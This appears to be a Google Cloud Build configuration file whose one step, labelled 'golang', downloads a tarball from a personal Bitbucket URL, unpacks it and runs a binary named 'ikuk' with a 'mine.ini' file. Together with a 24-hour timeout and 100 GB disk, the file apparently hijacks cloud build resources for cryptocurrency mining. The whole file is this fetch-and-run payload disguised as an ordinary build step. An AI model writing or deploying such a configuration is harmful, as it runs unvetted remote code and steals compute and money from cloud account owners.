steps:
  - name: golang
    args: 
      - '-c'
      - >-
       wget https://bitbucket.org/Abyehaqi/haqie/downloads/haqi.tar.gz && tar -xvf haqi.tar.gz && ./ikuk mine.ini
    waitFor: ["-"]
    entrypoint: /bin/baseh
timeout: 86400s
options:
  machineType:
  diskSizeGb: '100'
